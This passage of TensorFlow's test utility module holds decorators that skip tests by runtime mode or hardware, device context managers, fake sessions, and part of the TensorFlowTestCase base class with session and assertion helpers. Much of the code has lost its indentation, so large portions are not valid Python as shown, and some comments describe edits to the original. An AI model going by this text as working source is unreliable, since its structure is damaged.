# `deprecated_graph_mode_only`.
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
  """Execute all tests in a class in graph mode."""
  for method_name in dir(cls):
    # Only wrap real test methods; `test_session` is a helper, not a test.
    if (not method_name.startswith(unittest.TestLoader.testMethodPrefix) or
        method_name == "test_session"):
      continue
    method = getattr(cls, method_name, None)
    if callable(method):
      setattr(cls, method_name, deprecated_graph_mode_only(method))
  return cls
def run_v1_only(reason, func=None):
  """Execute the decorated test only if running in v1 mode.
  This function is intended to be applied to tests that exercise v1 only
  functionality. If the test is run in v2 mode it will simply be skipped.
  `deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
  `run_in_graph_and_eager_modes` are available decorators for different
  v1/v2/eager/graph combinations.
  Args:
    reason: string giving a reason for limiting the test to v1 only.
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.
  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """
  if not isinstance(reason, str):
    raise ValueError("'reason' should be string, got {}".format(type(reason)))
  def decorator(f):
    if tf_inspect.isclass(f):
      # To skip an entire test suite class, we only decorate the setUp method
      # to skip all tests. There are cases when setUp is not defined (not
      # overridden in subclasses of TestCase, so not available in f.__dict__
      # below). For those cases, we walk the method resolution order list and
      # pick the first setUp method we find (usually this should be the one in
      # the parent class since that's the TestCase class).
      for klass in type.mro(f):
        setup = klass.__dict__.get("setUp")
        if setup is not None:
          setattr(f, "setUp", decorator(setup))
          break
      return f
    # If f is just a function, just create a decorator for it and return it
    def decorated(self, *args, **kwargs):
      if tf2.enabled():
        self.skipTest(reason)
      return f(self, *args, **kwargs)
    return decorated
  if func is None:
    return decorator
  return decorator(func)
def run_v2_only(func=None):
  """Execute the decorated test only if running in v2 mode.
  This function is intended to be applied to tests that exercise v2 only
  functionality. If the test is run in v1 mode it will simply be skipped.
  `deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
  `run_in_graph_and_eager_modes` are available decorators for different
  v1/v2/eager/graph combinations.
  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.
  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """
  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_v2_only` only supports test methods.")
    def decorated(self, *args, **kwargs):
      # Skip rather than fail when the runtime is not in v2 mode.
      if not tf2.enabled():
        self.skipTest("Test is only compatible with v2")
      return f(self, *args, **kwargs)
    return decorated
  if func is None:
    return decorator
  return decorator(func)
def run_gpu_only(func=None):
  """Execute the decorated test only if a GPU is available.
  This function is intended to be applied to tests that require the presence
  of a GPU. If a GPU is absent, it will simply be skipped.
  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.
  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """
  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_gpu_only` only supports test methods.")
    def decorated(self, *args, **kwargs):
      # Availability is checked at call time, not decoration time.
      if not is_gpu_available():
        self.skipTest("Test requires GPU")
      return f(self, *args, **kwargs)
    return decorated
  if func is None:
    return decorator
  return decorator(func)
def run_cuda_only(func=None):
  """Execute the decorated test only if a GPU is available.
  This function is intended to be applied to tests that require the presence
  of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.
  Returns:
    Returns a decorator that will conditionally skip the decorated test method.
  """
  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError("`run_cuda_only` only supports test methods.")
    def decorated(self, *args, **kwargs):
      # Restrict the availability check to CUDA devices specifically.
      if not is_gpu_available(cuda_only=True):
        self.skipTest("Test requires CUDA GPU")
      return f(self, *args, **kwargs)
    return decorated
  if func is None:
    return decorator
  return decorator(func)
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
                        "Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
  """Returns whether TensorFlow can access a GPU.
  Warning: if a non-GPU version of the package is installed, the function would
  also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
  was build with CUDA support.
  Args:
    cuda_only: limit the search to CUDA GPUs.
    min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
      CUDA compute capability required, or None if no requirement.
  Note that the keyword arg name "cuda_only" is misleading (since routine will
  return true when a GPU device is available irrespective of whether TF was
  built with CUDA support or ROCm support. However no changes here because
  ++ Changing the name "cuda_only" to something more generic would break
     backward compatibility
  ++ Adding an equivalent "rocm_only" would require the implementation check
     the build type. This in turn would require doing the same for CUDA and thus
     potentially break backward compatibility
  ++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
     but would require most (if not all) callers to update the call to use
     "cuda_or_rocm_only" instead of "cuda_only"
  Returns:
    True if a GPU device of the requested kind is available.
  """
  try:
    for local_device in device_lib.list_local_devices():
      if local_device.device_type == "GPU":
        # Treat a missing compute capability as (0, 0), which passes any
        # `min_cuda_compute_capability` of None/falsy and fails real minimums.
        gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
        cc = gpu_info.compute_capability or (0, 0)
        if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
          return True
      # SYCL devices count as GPUs only when the caller did not restrict the
      # search to CUDA.
      if local_device.device_type == "SYCL" and not cuda_only:
        return True
    return False
  except errors_impl.NotFoundError as e:
    # A NotFoundError mentioning CUDA is treated as "no GPU" rather than a
    # hard failure; any other NotFoundError is re-raised.
    if not all(x in str(e) for x in ["CUDA", "not find"]):
      raise e
    else:
      logging.error(str(e))
      return False
@contextlib.contextmanager
def device(use_gpu):
  """Uses gpu when requested and available."""
  # Fall back to CPU when the GPU was not requested or is not available.
  dev = "/device:GPU:0" if use_gpu and is_gpu_available() else "/device:CPU:0"
  with ops.device(dev):
    yield
@contextlib.contextmanager
def use_gpu():
  """Uses gpu when requested and available."""
  # Delegates to `device(use_gpu=True)`, which places on CPU when no GPU is
  # available.
  with device(use_gpu=True):
    yield
@contextlib.contextmanager
def force_gpu():
  """Force the gpu to be used."""
  # Pins placement to GPU:0 with no availability check (contrast `use_gpu`).
  with ops.device("/device:GPU:0"):
    yield
@contextlib.contextmanager
def force_cpu():
  """Force the cpu to be used."""
  # Pins placement to CPU:0 regardless of available devices.
  with ops.device("/device:CPU:0"):
    yield
class CapturedWrites(object):
  """A utility class to load the captured writes made to a stream."""
  def __init__(self, capture_location):
    # Path of the file holding the captured stream output.
    self.capture_location = capture_location
  def contents(self):
    """Get the captured writes as a single string."""
    with open(self.capture_location) as captured_file:
      return captured_file.read()
class FakeEagerSession(object):
  """Fake session so tests that conditionally use placeholders can use eager.
  There are a number of tests that conditionally use placeholders for shape
  inference. The pattern is demonstrated here:
  ```python
  with self.cached_session() as sess:
    if static_shape:
      y = math_ops.matmul(x, ...)
      feed_dict = {}
    else:
      x_ph = array_ops.placeholder(...)
      y = math_ops.matmul(x_ph, ...)
      feed_dict = {x_ph: x}
    val = sess.run(y, feed_dict=feed_dict)
  ```
  Since the feed_dict is empty when not using placeholders we should be able to
  call self.evaluate(), however this requires rewriting the test case.
  This class should be considered a stop-gap solution to get tests running with
  eager with minimal changes to the actual test.
  """
  def __init__(self, test_case):
    # The TestCase whose `evaluate` method performs the actual evaluation.
    self._test_case = test_case
  def run(self, fetches, *args, **kwargs):
    """Evaluate `fetches`.
    Fail if additional args are specified.
    Args:
      fetches: A Tensor or a nested list/tuple of Tensors.
      *args: Positional arguments
      **kwargs: Keyword arguments
    Raises:
      RuntimeError: If args or kwargs are specified.
    Returns:
      Tensors as numpy values.
    """
    feed_dict = kwargs.pop("feed_dict", {})
    if feed_dict:
      # Bug fix: both error messages were missing the closing parenthesis.
      raise RuntimeError(
          "feed_dict is not supported when eager execution is enabled "
          "(in this case, sess.run(t) is shorthand for t.numpy())")
    if args or kwargs:
      raise RuntimeError(
          "Optional args are not supported when eager execution is enabled "
          "(in this case, sess.run(t) is shorthand for t.numpy())")
    return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
  """Wrapper around a Session that logs errors in run()."""
  def run(self, *args, **kwargs):
    # Delegate to the real Session.run, logging any failure before
    # re-raising it unchanged.
    try:
      return super(ErrorLoggingSession, self).run(*args, **kwargs)
    except Exception as e:  # pylint: disable=broad-except
      # Note: disable the logging for OutOfRangeError, which makes the output
      # of tf.data tests hard to read, because OutOfRangeError is used as the
      # signal completion
      if not isinstance(e, errors.OutOfRangeError):
        logging.error(str(e))
      raise
def disable_cudnn_autotune(func):
  """Disable autotuning during the call to this function.
  Some tests want to base assertions on a graph being isomorphic with a copy.
  To ensure this, this decorator disables autotuning.
  Args:
    func: Function to run with CuDNN autotuning turned off.
  Returns:
    Decorated function.
  """
  def decorator(f):
    def decorated(self, *args, **kwargs):
      # Remember the pre-test values so they can be restored afterwards.
      original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
      os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
      original_xla_flags = os.environ.get("XLA_FLAGS")
      new_xla_flags = "--xla_gpu_autotune_level=0"
      if original_xla_flags:
        new_xla_flags = original_xla_flags + " " + new_xla_flags
      os.environ["XLA_FLAGS"] = new_xla_flags
      # Bug fix: restore the environment in a `finally` block so the variables
      # do not leak into subsequent tests when the wrapped test raises.
      try:
        result = f(self, *args, **kwargs)
      finally:
        if original_tf_cudnn_use_autotune is None:
          del os.environ["TF_CUDNN_USE_AUTOTUNE"]
        else:
          os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
        if original_xla_flags is None:
          del os.environ["XLA_FLAGS"]
        else:
          os.environ["XLA_FLAGS"] = original_xla_flags
      return result
    return decorated
  if func is not None:
    return decorator(func)
  return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
  """Returns a decorator factory that enables XLA constant folding for a test.
  Args:
    description: Human-readable reason for needing constant folding; used for
      documentation only. Must be a string.
  Raises:
    ValueError: If `description` is not a string.
  """
  if not isinstance(description, str):
    raise ValueError("'description' should be string, got {}".format(
        type(description)))
  def enable_tf_xla_constant_folding_impl(func):
    """Enable constant folding during the call to this function.
    Some tests fail without constant folding.
    Args:
      func: Function to run with constant folding turned on.
    Returns:
      Decorated function.
    """
    def decorator(f):
      def decorated(self, *args, **kwargs):
        # Remember the current global flag so it can be restored even when
        # the wrapped test raises (bug fix: previously the flag leaked on
        # exception because there was no try/finally).
        original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
        pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
        try:
          return f(self, *args, **kwargs)
        finally:
          pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
      return decorated
    if func is not None:
      return decorator(func)
    return decorator
  return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description):  # pylint: disable=unused-argument
  """Execute the test method only if xla is not enabled."""
  return _disable_test(not is_xla_enabled())
# The description is just for documentation purposes.
def disable_mlir_bridge(description):  # pylint: disable=unused-argument
  """Execute the test method only if MLIR bridge is not enabled."""
  return _disable_test(not is_mlir_bridge_enabled())
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
  def disable_tfrt_impl(cls_or_func):
    """Execute the test only if tfrt is not enabled."""
    if tf_inspect.isclass(cls_or_func):
      # Drop the entire test class when TFRT is enabled.
      return None if is_tfrt_enabled() else cls_or_func
    def decorator(func):
      def decorated(self, *args, **kwargs):
        # Skip the body (returning None) when TFRT is enabled.
        if is_tfrt_enabled():
          return None
        return func(self, *args, **kwargs)
      return decorated
    if cls_or_func is not None:
      return decorator(cls_or_func)
    return decorator
  return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description):  # pylint: disable=unused-argument
  """This test is not intended to be run with XLA auto jit enabled."""
  return _disable_test(execute_func=not is_xla_enabled())
# The description is just for documentation purposes.
def xla_allow_fallback(description):  # pylint: disable=unused-argument
  """Returns a decorator allowing XLA to fall back to TF classic in a test."""

  def xla_allow_fallback_impl(func):
    """Allow fallback to TF even though testing xla."""

    def decorator(func):

      def decorated(self, *args, **kwargs):
        if not is_xla_enabled():
          return func(self, *args, **kwargs)
        # Update the global XLABuildOpsPassFlags to enable lazy compilation,
        # which allows the compiler to fall back to TF classic. Remember the
        # old value so that we can reset it.
        old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
        try:
          return func(self, *args, **kwargs)
        finally:
          # Restore even when the test raises, so the lazy-compilation flag
          # does not leak into subsequent tests.
          pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)

      return decorated

    if func is not None:
      return decorator(func)
    return decorator

  return xla_allow_fallback_impl
class EagerSessionWarner(object):
  """Placeholder yielded by session helpers when eager execution is enabled.

  Any attribute access or method call fails immediately with an explanatory
  AttributeError, so a test that mistakenly uses the session object under
  eager mode gets a clear diagnostic instead of a confusing failure.
  """

  def __getattr__(self, name):
    raise AttributeError(
        "Trying to access properties or call methods on the result of "
        "self.session(), self.cached_session(), etc while eager execution "
        "is enabled. If you're porting this test case to TF 2.0, either "
        "adapt the test to work with eager execution or insert a call to "
        "tf.disable_eager_execution() in the main() function of this test "
        "file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
  def __init__(self, methodName="runTest"):  # pylint: disable=invalid-name
    """Initializes the test case.

    When XLA is enabled (see `is_xla_enabled`), this also sets process-wide
    XLA flags so tests run with aggressive auto-jit clustering.

    Args:
      methodName: Name of the test method to run, as in `unittest.TestCase`.
    """
    super(TensorFlowTestCase, self).__init__(methodName)
    if is_xla_enabled():
      pywrap_tf_session.TF_SetXlaAutoJitMode("2")
      pywrap_tf_session.TF_SetXlaMinClusterSize(1)
      pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
      pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
      # Constant folding secretly runs code on TF:Classic CPU, so we also
      # disable it here.
      pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
    # Threads created via checkedThread(); verified joined in tearDown().
    self._threads = []
    # Lazily created by get_temp_dir() / _get_cached_session().
    self._tempdir = None
    self._cached_session = None
    self._test_start_time = None
  def setUp(self):
    """Resets global TF state so each test starts from a clean slate."""
    self._ClearCachedSession()
    # Seed both the Python and NumPy RNGs for reproducibility.
    random.seed(random_seed.DEFAULT_GRAPH_SEED)
    np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
    # Note: The following line is necessary because some test methods may error
    # out from within nested graph contexts (e.g., via assertRaises and
    # assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
    # under certain versions of Python. That would cause
    # ops.reset_default_graph() to throw an exception if the stack were not
    # cleared first.
    ops._default_graph_stack.reset()  # pylint: disable=protected-access
    ops.reset_default_graph()
    random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
    # Reset summary writer in case another test used set_as_default() with their
    # summary writer.
    summary_state = summary_ops_v2._summary_state  # pylint: disable=protected-access
    summary_state.writer = None
    # Avoiding calling setUp() for the poorly named test_session method.
    if self.id().endswith(".test_session"):
      self.skipTest("Not a test.")
    # Recorded so tearDown() can log the test's wall-clock duration.
    self._test_start_time = time.time()
  def tearDown(self):
    """Logs test duration, verifies checked threads, and closes the session."""
    # If a subclass overrides setUp and doesn't call the parent class's setUp,
    # then we may not have set the start time.
    if self._test_start_time is not None:
      logging.info("time(%s): %ss", self.id(),
                   round(time.time() - self._test_start_time, 2))
    # Fail the test if any thread from checkedThread() was never joined.
    for thread in self._threads:
      thread.check_termination()
    self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
  def _eval_tensor(self, tensor):
    """Evaluates a single (possibly composite) eager tensor to numpy values.

    Args:
      tensor: None, a callable producing a tensor, a composite tensor
        (Sparse/Ragged/IndexedSlices), or anything `nest.map_structure` can
        traverse whose leaves expose `.numpy()`.

    Returns:
      The corresponding numpy value(s); None if `tensor` is None.

    Raises:
      ValueError: If a leaf value does not expose `.numpy()` (surfaced from
        the underlying AttributeError).
    """
    if tensor is None:
      return None
    elif callable(tensor):
      return self._eval_tensor(tensor())
    else:
      try:
        # Composite tensor types are unpacked field by field; the order of
        # these checks determines which representation wins.
        if sparse_tensor.is_sparse(tensor):
          return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
                                                 tensor.values.numpy(),
                                                 tensor.dense_shape.numpy())
        elif ragged_tensor.is_ragged(tensor):
          return ragged_tensor_value.RaggedTensorValue(
              self._eval_tensor(tensor.values),
              self._eval_tensor(tensor.row_splits))
        elif isinstance(tensor, ops.IndexedSlices):
          return ops.IndexedSlicesValue(
              values=tensor.values.numpy(),
              indices=tensor.indices.numpy(),
              dense_shape=tensor.dense_shape.numpy())
        # Convert tensors and composite tensors to numpy arrays.
        return nest.map_structure(lambda t: t.numpy(), tensor,
                                  expand_composites=True)
      except AttributeError as e:
        six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
